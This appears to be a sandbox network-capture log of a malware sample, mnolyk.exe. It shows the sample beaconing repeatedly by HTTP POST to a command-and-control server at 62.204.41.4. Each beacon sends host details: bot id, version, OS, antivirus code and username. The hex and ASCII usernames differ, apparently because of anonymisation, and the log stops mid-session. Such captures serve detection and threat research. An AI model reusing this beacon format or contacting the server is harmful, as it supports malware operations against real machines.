                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      570 | 192.168.2.7 | 50298 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:32.460706949 CET | 1030 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:32.526222944 CET | 1030 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      571 | 192.168.2.7 | 50299 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:32.713859081 CET | 1031 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:32.777806044 CET | 1031 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      572 | 192.168.2.7 | 50300 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:32.957645893 CET | 1032 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:33.021564960 CET | 1032 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:32 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      573 | 192.168.2.7 | 50301 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:33.190298080 CET | 1033 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:33.258894920 CET | 1033 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      574 | 192.168.2.7 | 50302 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:33.426502943 CET | 1034 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:33.490863085 CET | 1034 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      575 | 192.168.2.7 | 50303 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:33.662983894 CET | 1035 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:33.727881908 CET | 1035 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      576 | 192.168.2.7 | 50304 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:33.925232887 CET | 1036 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:33.989304066 CET | 1036 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      577 | 192.168.2.7 | 50305 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:34.163427114 CET | 1037 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:34.229917049 CET | 1037 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      578 | 192.168.2.7 | 50306 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:34.417912006 CET | 1038 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:34.481225967 CET | 1038 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      579 | 192.168.2.7 | 50307 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:34.659310102 CET | 1039 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:34.725996971 CET | 1039 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      58 | 192.168.2.7 | 49783 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:36:11.707389116 CET | 496 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:11.770190954 CET | 497 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:11 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      580 | 192.168.2.7 | 50308 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:34.900026083 CET | 1040 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:34.966207981 CET | 1040 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:34 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      581 | 192.168.2.7 | 50309 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:35.147885084 CET | 1041 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:35.214554071 CET | 1041 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      582 | 192.168.2.7 | 50310 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:35.397049904 CET | 1042 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:35.460278034 CET | 1042 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      583 | 192.168.2.7 | 50311 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:35.648200989 CET | 1043 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:35.711546898 CET | 1043 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      584 | 192.168.2.7 | 50312 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:35.876032114 CET | 1044 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:35.939383030 CET | 1044 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      585 | 192.168.2.7 | 50313 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:36.114306927 CET | 1045 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:36.181561947 CET | 1045 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      586 | 192.168.2.7 | 50314 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:36.369028091 CET | 1046 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:38:36.434140921 CET | 1046 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:38:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      587 | 192.168.2.7 | 50315 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 6, 2023 18:38:36.612364054 CET | 1047 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
